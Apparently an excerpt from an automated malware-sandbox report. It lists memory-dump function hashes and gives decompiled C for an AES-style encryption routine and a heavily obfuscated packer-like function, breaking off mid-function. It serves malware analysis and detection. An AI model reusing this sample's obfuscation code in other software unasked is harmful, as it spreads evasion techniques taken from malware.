                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CA57C3, Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                    • Opcode ID: deda2730c106b793deb6022644ab5eed42578513340d44c4212a2fe3a1956b73
                                                                                                                                                    • Instruction ID: 6e7387e5cf6fdbc6b24366b7bffe2aa636266aa67acae74c49106df88dce7376
                                                                                                                                                    • Opcode Fuzzy Hash: deda2730c106b793deb6022644ab5eed42578513340d44c4212a2fe3a1956b73
                                                                                                                                                    • Instruction Fuzzy Hash: 60A1F371A4424E7ADF24CF60CC51BFE77A5EB0A308F0440ADF956DA1C1CA798E94EB20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C50080, Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: [Pj
                                                                                                                                                    • API String ID: 0-2289356113
                                                                                                                                                    • Opcode ID: 2d835cd30ceb7cb201cad1b928f4082cc9a497507120315e9fecf03e31d0ff54
                                                                                                                                                    • Instruction ID: efb8bd9c77c9d7aaca5d1aaad2a6f1c6877865d71d12436f66c44de0281c2c5b
                                                                                                                                                    • Opcode Fuzzy Hash: 2d835cd30ceb7cb201cad1b928f4082cc9a497507120315e9fecf03e31d0ff54
                                                                                                                                                    • Instruction Fuzzy Hash: 56F0F6352043447BE7119B10CC85F2A7BA5FF82705F208418FC459E0D3C772C895E725
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C72305, Relevance: .5, Instructions: 528COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1f7938c2d5ddf855c504859c23fdb37d9bddb76a49a89d4610d6cf5dc2c5494
                                                                                                                                                    • Instruction ID: 95e0962ccb50df6bf3a15aa862c922b10b878080164970de8bceb74465aba7f9
                                                                                                                                                    • Opcode Fuzzy Hash: a1f7938c2d5ddf855c504859c23fdb37d9bddb76a49a89d4610d6cf5dc2c5494
                                                                                                                                                    • Instruction Fuzzy Hash: 7702B833D497B78B47714EFE40E052A7AA09E0169031FC7E9DCE83F296C116DE0996E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C9286D, Relevance: .5, Instructions: 460COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fbb72c29a3ef3608112ba24ccd22580ea3a8ac5ce98db8869db191b12f10e6ad
                                                                                                                                                    • Instruction ID: 6b4460f8a276b4e58ba1a82632c1bf510d65c5b77ef1d18f111db796e9250510
                                                                                                                                                    • Opcode Fuzzy Hash: fbb72c29a3ef3608112ba24ccd22580ea3a8ac5ce98db8869db191b12f10e6ad
                                                                                                                                                    • Instruction Fuzzy Hash: 20029D7190012AABCF349F59C8887F9B3B5EF18704F5440EAE999A7190E7358FD1EB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 26%
                                                                                                                                                    			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                                                                                                                    0x00402fb0
                                                                                                                                                    0x00402fbf
                                                                                                                                                    0x00402fc8
                                                                                                                                                    0x00402fd6
                                                                                                                                                    0x00402fda
                                                                                                                                                    0x00402fe3
                                                                                                                                                    0x00402ff4
                                                                                                                                                    0x00402ff7
                                                                                                                                                    0x00402ffc
                                                                                                                                                    0x00403005
                                                                                                                                                    0x00403013
                                                                                                                                                    0x00403018
                                                                                                                                                    0x00403021
                                                                                                                                                    0x00403031
                                                                                                                                                    0x00403051
                                                                                                                                                    0x00403054
                                                                                                                                                    0x00403066
                                                                                                                                                    0x0040306b
                                                                                                                                                    0x00403080
                                                                                                                                                    0x0040309d
                                                                                                                                                    0x004030a0
                                                                                                                                                    0x004030b1
                                                                                                                                                    0x004030c6
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030e9
                                                                                                                                                    0x004030fb
                                                                                                                                                    0x00403119
                                                                                                                                                    0x00403136
                                                                                                                                                    0x00403139
                                                                                                                                                    0x0040314b
                                                                                                                                                    0x00403160
                                                                                                                                                    0x00403166
                                                                                                                                                    0x0040316e
                                                                                                                                                    0x0040316f
                                                                                                                                                    0x00403172
                                                                                                                                                    0x00403180
                                                                                                                                                    0x00403190
                                                                                                                                                    0x004031a2
                                                                                                                                                    0x004031b4
                                                                                                                                                    0x004031d0
                                                                                                                                                    0x004031e3
                                                                                                                                                    0x004031f0
                                                                                                                                                    0x00403201
                                                                                                                                                    0x00403218
                                                                                                                                                    0x0040323a
                                                                                                                                                    0x0040323d
                                                                                                                                                    0x0040324e
                                                                                                                                                    0x00403269
                                                                                                                                                    0x00403280
                                                                                                                                                    0x00403283
                                                                                                                                                    0x00403295
                                                                                                                                                    0x0040329d
                                                                                                                                                    0x004032b2
                                                                                                                                                    0x004032cf
                                                                                                                                                    0x004032d2
                                                                                                                                                    0x004032e3
                                                                                                                                                    0x00403307
                                                                                                                                                    0x00403317
                                                                                                                                                    0x0040331a
                                                                                                                                                    0x0040332c
                                                                                                                                                    0x00403344
                                                                                                                                                    0x00403347
                                                                                                                                                    0x0040335a
                                                                                                                                                    0x00403367
                                                                                                                                                    0x00403379
                                                                                                                                                    0x00403391
                                                                                                                                                    0x004033b4
                                                                                                                                                    0x004033b7
                                                                                                                                                    0x004033c9
                                                                                                                                                    0x004033de
                                                                                                                                                    0x004033e4
                                                                                                                                                    0x004033e4
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x00403180
                                                                                                                                                    0x0040344b
                                                                                                                                                    0x00403454
                                                                                                                                                    0x00403462
                                                                                                                                                    0x004034c0
                                                                                                                                                    0x004034c9
                                                                                                                                                    0x004034d7
                                                                                                                                                    0x00403539
                                                                                                                                                    0x00403542
                                                                                                                                                    0x0040354f
                                                                                                                                                    0x00403552
                                                                                                                                                    0x0040359e
                                                                                                                                                    0x004035aa
                                                                                                                                                    0x004035b3
                                                                                                                                                    0x004035c0
                                                                                                                                                    0x004035c7

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                    • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                                                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                    • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BC66, Relevance: .4, Instructions: 428COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                                    			E0041BC66(signed int __eax, void* __ecx, signed int __edi, signed int __esi) {
				signed char _t65;
				signed char _t66;
				signed char _t67;
				void* _t70;
				signed char _t72;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				void* _t82;
				signed int _t87;
				signed int _t89;
				void* _t98;
				void* _t101;

				_t81 = __edi;
				asm("sbb edx, 0x72cf58e9");
				_t101 = 0x9a2c6ddc;
				 *0x7d2f62bd =  *0x7d2f62bd >> 0x86;
				asm("adc esi, 0x9cc1d683");
				asm("adc [0xb4e1bbb7], al");
				asm("adc eax, [0xddb83826]");
				 *0xe6ca288 = 0xc3d86af7;
				_t65 = __eax |  *0x31d7232e;
				asm("ror byte [0x77953802], 0x11");
				asm("rcl dword [0xd126ddef], 1");
				 *0x8911611e =  *0x8911611e ^ 0x9a2c6ddc;
				_t76 = 0x68f73df3;
				asm("adc edx, [0x2dce8619]");
				_t80 =  *0x2f29316b * 0x840f;
				_push(_t80);
				 *0xb7d8836e = _t89 &  *0x8068242e;
				asm("stosb");
				_t72 =  *0x885fcd0b;
				 *0xcfc014e3 =  *0xcfc014e3 << 0xfe;
				_t87 = __esi & 0xf7f82029;
				 *0xd93bc3f5 =  *0xd93bc3f5 >> 0x82;
				asm("rcl dword [0x6ccdfe31], 0x1f");
				if(_t87 >= 0) {
					L1:
					asm("ror dword [0x57b1f009], 0x69");
					_t101 = _t101 + 1;
					asm("rol dword [0x3935b90d], 0xf3");
				} else {
					__ebx =  *0x99e3097d * 0x55c;
					__cl = __cl &  *0x49c6d2b5;
					_push( *0xcdd93ba1);
					asm("cmpsb");
					 *0xdaf91313 =  *0xdaf91313 | 0x9a2c6ddc;
					asm("rcl dword [0xf422f0bc], 0x1b");
					asm("sbb edi, [0x617dac1f]");
					 *0xc88fdd89 =  *0xc88fdd89 & 0x9a2c6ddc;
					_push( *0x75d3250f);
					 *0x5e9f25e6 =  *0x5e9f25e6 << 0xa7;
					__cl = 0xe7;
					_pop(__ebx);
					asm("rcl byte [0x7f199230], 0x41");
					_t35 = __esp;
					__esp =  *0xd8a5dbc;
					 *0xd8a5dbc = _t35;
					asm("sbb eax, [0x8768fe6f]");
					__edx = 0x72edcc05;
					__ecx = __ecx &  *0xc917d01e;
					if(0x68f73df3 >= 0) {
						goto L1;
					} else {
						__ebx =  *0x3b81977d * 0x56d1;
						__ebx =  *0x3b81977d * 0x000056d1 ^  *0xde0dcfba;
						asm("stosd");
						if(__ebx < 0) {
							goto L1;
						} else {
							_pop( *0x2752d970);
							asm("lodsb");
							asm("adc bl, 0x24");
							 *0xc7d1d3e5 =  *0xc7d1d3e5 ^ __bl;
							__esp = __esp + 0x1e771f16;
							__ah = __ah + 0x80;
							asm("cmpsw");
							__eax = 0x86f3a2df;
							__edx = __esi;
							__esi = __esi ^  *0xd55a4601;
							 *0xe06ef2c9 =  *0xe06ef2c9 - __dl;
							__ebp = __ebp &  *0xc302c513;
							__ch = __ch & 0x0000001c;
							asm("sbb ebx, [0xf490f493]");
							asm("movsb");
							__edi = __edi &  *0xac8f46ee;
							__ah = __ah ^  *0xe91d6e0a;
							_t38 = __edi;
							__edi =  *0x140a1afe;
							 *0x140a1afe = _t38;
							asm("rcr byte [0xbf968a0a], 0x27");
							__edi =  *0x140a1afe;
							__esi = __esi + 0x16084cc7;
							_push(__ebx);
							__ch = __ch &  *0x33b352a2;
							asm("adc edi, 0xa073696d");
							asm("adc esi, [0x379ded01]");
							__edi =  *0x140a1afe +  *0x6ef2c9d5;
							__ecx = __ecx ^  *0xbbd603cc;
							__esi = __esi &  *0xb130aaf7;
							asm("cmpsb");
							 *0x58ab6019 =  *0x58ab6019 << 0x43;
							asm("lodsd");
							__cl = 0xff;
							__esp = __esp +  *0x90841f9b;
							__ebp = __ebp |  *0x59410207;
							 *0x9c0398b0 =  *0x9c0398b0 >> 0x17;
							__eax = 0xffffffff86f3a2e0;
							if(0x86f3a2df > 0) {
								goto L1;
							} else {
								asm("adc ecx, [0xd13b7c77]");
								_push(__esi);
								 *0x2108cfba =  *0x2108cfba >> 0x5b;
								__ebp = __ebp | 0x7e8e8913;
								 *0x1a7b31f1 =  *0x1a7b31f1 ^ __ebp;
								__eax = 0xffffffff86f3a2df;
								__edx = 0x72edcc05 +  *0x29724189;
								__dl = 0x24;
								__edi = __edi - 1;
								__edi = __edi ^ 0xa74fda3e;
								__esi = __esi -  *0x254bf2eb;
								__esi = __esi - 1;
								__esp = __esp |  *0x40e2c06;
								__bl = __bl | 0x0000002a;
								 *0x28a30dc4 =  *0x28a30dc4 << 0xdc;
								 *0x33c4ebb7 =  *0x33c4ebb7 - 0xe7;
								asm("sbb edx, [0xd3e528c7]");
								 *0xe56c7d1 =  *0xe56c7d1 ^ __esi;
								__ecx = __ecx + 1;
								__edx = 0x72edcc05 +  *0x29724189 + 1;
								 *0x110b39d4 =  *0x110b39d4 << 0x8d;
								 *0xde2f1d82 =  *0xde2f1d82 | __bh;
								__edi = __edi - 1;
								__edi = __edi |  *0x161fa306;
								_push( *0x9963b99a);
								_push(__ebx);
								asm("cmpsw");
								__dh = __dh +  *0xa40075b1;
								asm("adc al, 0xc");
								__dl =  *0xc7d1d3e5;
								 *0xc7d1d3e5 = 0x24;
								asm("adc [0x7f6cc113], eax");
								asm("ror dword [0xa0244dbd], 0x5c");
								__esi = __esi -  *0xbe51c90d;
								_push( *0x6ecc2c07);
								_pop( *0x1afee91d);
								asm("adc dh, 0x10");
								__ebx = __ebx - 0x6f29883b;
								asm("adc esi, [0x53e64df1]");
								__ebx = __esi;
								asm("adc ch, 0xc9");
								asm("sbb [0x40f080f], edi");
								_push( *0x5941583d);
								asm("scasd");
								_pop(__esi);
								 *0x92305be7 =  *0x92305be7 >> 0x32;
								 *0x8bc1e720 =  *0x8bc1e720 << 0x9a;
								__esp = __esp &  *0xfad4e61f;
								__ecx = __ecx -  *0xf527feee;
								__edx = 0x72edcc05 +  *0x29724189 + 2;
								__esi = 0xec9fa9cc;
								_t48 = __dh;
								__dh =  *0xb3cf6980;
								 *0xb3cf6980 = _t48;
								__ah = __ah & 0x0000003a;
								asm("sbb [0xbf2e5335], eax");
								asm("sbb al, [0x4c7d3d0c]");
								__esi = 0xffffffffec9fa9cb;
								 *0x4115c717 =  *0x4115c717 >> 0xf0;
								 *0x39801330 =  *0x39801330 + __al;
								__edx = 0x72edcc05 +  *0x29724189 + 2 - 1;
								asm("movsw");
								__edx = 0x72edcc05 +  *0x29724189 + 2 - 1 -  *0x1866ffdd;
								__edi = __edi + 1;
								__esp = __esp - 1;
								asm("adc [0x245b1f16], edi");
								__edx = 0x72edcc05 +  *0x29724189 + 2 - 0x00000001 -  *0x1866ffdd &  *0xd771687;
								 *0x563ff564 =  *0x563ff564 >> 0x49;
								_push(0x86da796f);
								__ecx = __ecx - 1;
								__ch = __ch ^  *0xb36fc7e0;
								asm("adc [0x60ce066], ecx");
								__ebp = __ebp &  *0x61b1753d;
								_push(__ebx);
								asm("adc ch, 0xb7");
								if((__ebx & 0xc34c6b95) <= 0) {
									goto L1;
								} else {
									asm("ror dword [0x6d560e76], 0xb5");
									__esi = 0xffffffffc4a6e3c6;
									 *0xd4e5cee7 =  *0xd4e5cee7 << 0x2f;
									if( *0xd4e5cee7 >= 0) {
										goto L1;
									} else {
